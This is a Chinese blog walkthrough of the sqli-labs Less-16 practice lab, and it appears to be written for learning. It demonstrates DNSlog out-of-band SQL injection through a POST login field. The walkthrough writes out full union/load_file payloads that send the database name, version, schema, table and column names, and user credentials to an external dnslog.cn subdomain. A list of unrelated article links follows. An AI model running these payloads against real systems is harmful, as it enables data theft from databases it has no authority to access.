当前位置：首页 > news >正文

sqli-labs less-16 post提交dnslog注入

news 2025/7/9 12:43:23

post提交DNSlog注入

第十六关和和十五关大差不大，可以使用布尔注入，时间盲注等，只不过闭合方式不一样，但是用布尔和时间盲太过于消耗时间，本次测试我将使用dnslog注入。

使用在线平台`http://www.dnslog.cn/`

在这里插入图片描述

闭合方式，注入点，列数

在这里插入图片描述
通过尝试各种闭合方式确定闭合方式为"),具体方式可以参考我前面几篇文章。
列数通过union select 1,2一次递增后面的数字来尝试，得到有两列

进行注入

构造语句：

uname=zzz") union select 1,load_file(concat(“//”,(select database()),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
得到数据库名

在这里插入图片描述

版本
uname=zzz") union select 1,load_file(concat(“//”,(select version()),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit

爆出所有数据

uname=zzz") union select 1,load_file(concat(“//”,(select schema_name from information_schema.schemata limit 0,1),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
可以修改limit函数的值来得到所有的数据库名，

表名

uname=zzz") union select 1,load_file(concat(“//”,(select table_name from information_schema.tables where table_schema=database() limit 0,1),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
得到所有表名方法如上

列名

uname=zzz") union select 1,load_file(concat(“//”,(select column_name from information_schema.columns where table_schema=database() and table_name=‘users’ limit 0,1),“.ixyswd.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
其他数据修改limit函数参数

数据

uname=zzz") union select 1,load_file(concat(“//”,(select concat(username,‘.’,password) from security.users limit 0,1 ),“.8orsud.dnslog.cn/1.txt”)) # &passwd=xxx&Submit=Submit
修改limit值可以得到所有数据

完成！！！！！

sqli-labs less-16 post提交dnslog注入

post提交DNSlog注入第十六关和和十五关大差不大，可以使用布尔注入，时间盲注等，只不过闭合方式不一样，但是用布尔和时间盲太过于消耗时间，本次测试我将使用dnslog注入。使用在线平台http://www.dnslog.cn/ 闭合方式…...

编程日记 2024/10/8 13:38:56

nginx报错|xquic|xqc_engine_create: fail|

编程日记 2024/10/8 13:37:51

Java虚拟机(JVM)

目录内存区域划分堆（Heap）方法区（Method Area）程序计数器（Program Counter Register）虚拟机栈（VM Stack）本地方法栈（Native Method Stack） 类加载的过程类加…...

编程日记 2024/10/8 13:36:49

MQ 架构设计原理与消息中间件详解（三）

RabbitMQ实战解决方案 RabbitMQ死信队列死信队列产生的背景 RabbitMQ死信队列俗称，备胎队列；消息中间件因为某种原因拒收该消息后，可以转移到死信队列中存放，死信队列也可以有交换机和路由key等。产生死信队列的原因消息投…...

编程日记 2024/10/8 13:35:48

大数据新视界 --大数据大厂之 Alluxio 数据缓存系统在大数据中的应用与配置

💖💖💖亲爱的朋友们，热烈欢迎你们来到青云交的博客！能与你们在此邂逅，我满心欢喜，深感无比荣幸。在这个瞬息万变的时代，我们每个人都在苦苦追寻一处能让心灵安然栖息的港湾。而我的…...

编程日记 2024/10/8 13:34:46

PHP基本语法总结

目录输出语句注释数据类型（变量） 局部和全局作用域类型比较（松散比较与严格比较） 常量运算符并置运算符不等于逻辑运算符条件语句数组关联数组数组排序一般数组关联数组循环函数变量函数魔…...

编程日记 2024/10/8 13:33:43

尚硅谷rabbitmq 2024第30-33节死信队列答疑

Virtual host: Type: Name: Durabiity: Arguments: Default for virtual host w ququt.normal.video Durable x-dead-letter-exchange x-dead-1etter-routing-xey x-mAx-1ength X-m在88点0也-6E1 exchange.dead.letter.vide zouting.key.dead.ietter.v 10 String String Number…...

编程日记 2024/10/8 13:32:27

解锁空间距离计算的多种方式-含前端、空间数据库、后端

目录前言一、空间数据库求解 1、PostGIS实现二、GIS前端组件求解 1、Leaflet.js距离测算 2、Turf.js前端计算三、后台距离计算生成 1、欧式距离 2、Haversice球面距离 3、GeoTools距离计算 4、Gdal距离生成 5、geodesy距离计算四、成果与生成对比 1、Java不…...

编程日记 2024/10/8 13:29:23

Windows 开发工具使用技巧 QT使用安装和使用技巧 QT快捷键

一、QT配置 1. 安装 Qt 开发框架 1、下载 1、进入下载地址下载地址1 (官方, 需注册账号)： https://www.qt.io/download下载地址2（推荐）： http://download.qt.io/http://download.qt.io/archive/qt/ （或更直接的…...

编程日记 2024/10/8 13:28:22

【实战教程】SpringBoot全面指南：快速上手到项目实战(SpringBoot)

文章目录【实战教程】SpringBoot全面指南：快速上手到项目实战(SpringBoot)1. SpringBoot介绍1.1 SpringBoot简介1.2系统要求1.3 SpringBoot和SpringMVC区别1.4 SpringBoot和SpringCloud区别 2.快速入门3. Web开发3.1 静态资源访问3.2 渲染Web页面3.3 YML与Properti…...

编程日记 2024/10/8 13:24:16

LeetCode讲解篇之1043. 分隔数组以得到最大和

文章目录题目描述题解思路题解代码题目链接题目描述题解思路对于这题我们这么考虑，我们选择以数字的第i个元素做为分隔子数组的右边界，我们需要计算当前分隔子数组的长度为多少时能让数组[0, i]进行分隔数组的和最大我们用数组f表示[0, i)区间内的…...

编程日记 2024/10/8 13:23:14

Python知识点：结合Python工具，如何使用TfidfVectorizer进行文本特征提取

开篇，先说一个好消息，截止到2025年1月1日前，翻到文末找到我，赠送定制版的开题报告和任务书，先到先得！过期不候！ 如何使用Python的TfidfVectorizer进行文本特征提取在自然语言处理（…...

编程日记 2024/10/8 13:20:08

Diffusion models（扩散模型）是怎么工作的

前言给一个提示词, Midjourney, Stable Diffusion 和 DALL-E 可以生成很好看的图片，那么它们是怎么工作的呢？它们都用了 Diffusion models（扩散模型） 这项技术。 Diffusion models 正在成为生命科学等领域的一项尖端技术&…...

编程日记 2024/10/8 13:17:02

查找回收站里隐藏的文件

在Windows里，每个磁盘分区都有一个隐藏的回收站Recycle， 回收站里保存着用户删除的文件、图片、视频等数据，比如，C盘的回收站为C:\RECYCLE.BIN\，D盘的的回收站为D:\RECYCLE.BIN\，E盘的的回收站为E:\RECYCLE…...

编程日记 2024/10/8 13:15:00

[运维]2.elasticsearch-svc连接问题

Serverless 与容器决战在即？有了弹性伸缩就不一样了 - 阿里云云原生 - 博客园当我部署好elasticsearch的服务后，由于个人习惯，一般服务会在name里带上svc，所以我elasticsearch服务的名字是elasticsearch-svc： [root…...

编程日记 2024/10/8 13:13:58

Ajax面试题：（第一天）

目录 1.说一下网络模型 2.在浏览器地址栏键入URL，按下回车之后会经历以下流程： 3.什么是三次握手和四次挥手？ 4.http协议和https协议的区别 1.说一下网络模型注：各层含义按自己理解即可 2.在浏览器地址栏键入URL，…...

编程日记 2024/10/8 13:12:57

数据仓库拉链表

数仓拉链表是数据仓库中常用的一种数据结构，用于记录维度表中某个属性的历史变化情况。在实际应用中，数仓拉链表可以帮助企业更好地进行数据分析和决策。数仓拉链表（Slowly Changing Dimension, SCD）是一种用于处理维表中数据变化…...

编程日记 2024/10/8 13:11:56

【JVM】实战篇

1、内存调优 1.1 内存溢出和内存泄漏内存泄漏（memory leak）：在Java中如果不再使用一个对象，但是该对象依然在GC ROOT的引用链上，这个对象就不会被垃圾回收器回收，这种情况就称之为内存泄漏。内存泄漏绝…...

编程日记 2024/10/8 13:10:55

2024年9月30日--10月6日（ue5肉鸽结束）

按照月计划，本周把ue肉鸽游戏完成，然后进行ue5太阳系 ， 剩余14节，218分钟，如果按照10分钟的视频教程1小时进行完的话，则需要22小时，分布在10月2日-10月6日之间，每天44分钟的视频教程…...

编程日记 2024/10/8 13:09:53

【Python游戏开发】贪吃蛇游戏demo

准备步骤项目开发使用【Mu 编辑器】 1.新建项目，并导入游戏图片游戏编写 1.创建场景 SIZE 15 # 每个格子的大小 WIDTH SIZE * 30 # 游戏场景总宽度 HEIGHT SIZE * 30 # 游戏场景总高度def draw():screen…...

编程日记 2024/10/8 13:08:53

无法与IP建立连接，未能下载VSCode服务器

如题，在远程连接服务器的时候突然遇到了这个提示。查阅了一圈，发现是VSCode版本自动更新惹的祸！！！ 在VSCode的帮助->关于这里发现前几天VSCode自动更新了，我的版本号变成了1.100.3 才导致了远程连接出…...

编程新知 2025/7/8 11:04:02

线程与协程

1. 线程与协程 1.1. “函数调用级别”的切换、上下文切换 1. 函数调用级别的切换 “函数调用级别的切换”是指：像函数调用/返回一样轻量地完成任务切换。举例说明： 当你在程序中写一个函数调用： funcA() 然后 funcA 执行完后返回&…...

编程新知 2025/6/16 12:40:21

selenium学习实战【Python爬虫】

selenium学习实战【Python爬虫】文章目录 selenium学习实战【Python爬虫】一、声明二、学习目标三、安装依赖3.1 安装selenium库3.2 安装浏览器驱动3.2.1 查看Edge版本3.2.2 驱动安装四、代码讲解4.1 配置浏览器4.2 加载更多4.3 寻找内容4.4 完整代码五、报告文件爬取5.1 提…...

编程新知 2025/7/6 10:04:23